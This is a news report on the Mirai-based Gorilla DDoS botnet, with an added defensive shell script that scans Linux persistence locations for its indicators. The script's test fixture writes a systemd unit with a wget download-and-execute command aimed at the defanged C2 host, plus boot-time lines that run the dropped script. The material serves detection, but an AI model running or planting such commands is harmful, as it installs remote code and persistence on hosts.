Cybersecurity experts have identified a new family of botnet malware known as Gorilla (or GorillaBot), which is based on the leaked source code of the Mirai botnet.
NSFOCUS, a cybersecurity firm that detected the botnet's activity last month, reported that it executed over 300,000 attack commands with alarming frequency between September 4 and September 27, 2024. On average, the botnet launched no fewer than 20,000 commands each day aimed at carrying out distributed denial-of-service (DDoS) attacks.
The Gorilla botnet has hit targets in more than 100 countries, spanning universities, government websites, and the telecommunications, banking, gaming, and gambling sectors, with China, the U.S., Canada, and Germany the most affected nations.
According to NSFOCUS, Gorilla employs several DDoS attack methods, including UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood. Because UDP is connectionless, the source IP address of each packet can be spoofed arbitrarily, which lets the bots generate large volumes of traffic that is difficult to attribute or filter by origin.
The botnet is compatible with multiple CPU architectures such as ARM, MIPS, x86_64, and x86, and can connect to one of five predefined command-and-control (C2) servers to receive DDoS commands.
The malware also contains a function that exploits a vulnerability in Apache Hadoop YARN RPC to achieve remote code execution. That flaw has been exploited in the wild since at least 2021, as reported by Alibaba Cloud and Trend Micro.
To maintain persistence on infected hosts, Gorilla creates a systemd unit named custom.service in "/etc/systemd/system/" so that it is started at boot. The service downloads and executes a shell script ("lol.sh") from a remote server ("pen.gorillafirewall[.]su"). Similar commands are also written into "/etc/inittab," "/etc/profile," and "/boot/bootcmd," so the script is re-run at system startup or whenever a user logs in. Note that the unit file name is attacker-chosen; a triage check should look for the download-and-execute command and the C2 host in these locations rather than relying on the name custom.service alone.
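The following is an added example, not code from the article or from NSFOCUS: a read-only triage script that checks the persistence locations named above (the custom.service unit, /etc/inittab, /etc/profile, /boot/bootcmd, plus any other unit file under /etc/systemd/system) for the dropper script name and the C2 host. The indicator regex, the helper names, and the sample file trees it builds are constructed for illustration; the sample unit uses the defanged hostname and no real payload.

```shell
#!/bin/sh
# Added example (not from the original article or NSFOCUS): read-only triage
# for the Gorilla persistence artifacts. Point it at / on a live host or at
# the mount point of an offline disk image.

# Constructed indicator pattern: the dropper script name and the C2 host
# named in the article. Extend with your own IOCs as needed.
GORILLA_IOC_RE='lol\.sh|gorillafirewall'

# Persistence locations named in the article, relative to the scanned root.
GORILLA_PERSIST_FILES='etc/systemd/system/custom.service etc/inittab etc/profile boot/bootcmd'

# scan_gorilla_persistence ROOT
# Prints "path:line:content" for every matching line.
# Returns 0 if at least one indicator was found, 1 otherwise, so the exit
# status can drive alerting from a cron job or an EDR custom check.
scan_gorilla_persistence() {
    root="${1:-/}"
    hits=0
    for rel in $GORILLA_PERSIST_FILES; do
        f="$root/$rel"
        [ -f "$f" ] || continue
        # Passing /dev/null as a second file forces grep to print the file name.
        if grep -nE "$GORILLA_IOC_RE" "$f" /dev/null; then
            hits=$((hits + 1))
        fi
    done
    # The unit name is attacker-chosen, so check every other unit file too.
    for unit in "$root"/etc/systemd/system/*.service; do
        [ -f "$unit" ] || continue
        case "$unit" in */custom.service) continue ;; esac
        if grep -nE "$GORILLA_IOC_RE" "$unit" /dev/null; then
            hits=$((hits + 1))
        fi
    done
    [ "$hits" -gt 0 ]
}

# make_gorilla_sample_tree DIR
# Builds a constructed file tree that mimics the described persistence
# (defanged hostname, no real payload) so the scanner can be tested offline.
make_gorilla_sample_tree() {
    d="$1"
    mkdir -p "$d/etc/systemd/system" "$d/boot"
    printf '[Unit]\nDescription=custom\n[Service]\nExecStart=/bin/sh -c "wget http://pen.gorillafirewall[.]su/lol.sh -O /tmp/lol.sh && sh /tmp/lol.sh"\n[Install]\nWantedBy=multi-user.target\n' \
        > "$d/etc/systemd/system/custom.service"
    printf 'id:3:initdefault:\n::sysinit:/bin/sh /tmp/lol.sh\n' > "$d/etc/inittab"
    printf 'export PATH\n/bin/sh /tmp/lol.sh &\n' > "$d/etc/profile"
    printf 'boot\nsh /tmp/lol.sh\n' > "$d/boot/bootcmd"
}

# make_clean_sample_tree DIR
# A constructed benign tree used as the negative control.
make_clean_sample_tree() {
    d="$1"
    mkdir -p "$d/etc/systemd/system" "$d/boot"
    printf '[Unit]\nDescription=sshd\n[Service]\nExecStart=/usr/sbin/sshd -D\n' \
        > "$d/etc/systemd/system/ssh.service"
    printf 'export PATH\n' > "$d/etc/profile"
}
```

Run it as `scan_gorilla_persistence /` on a suspect host, or against a mounted image root. The grep-based check is deliberately simple; a more thorough sweep would also compare the listed files against package-manager checksums and look for the downloaded script itself.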
NSFOCUS noted that Gorilla employs various DDoS attack techniques and utilizes encryption algorithms similar to those used by the Keksec group to conceal sensitive information, demonstrating a high level of counter-detection awareness as it seeks to maintain long-term control over IoT devices and cloud hosts.
Credit: TheHackerNews.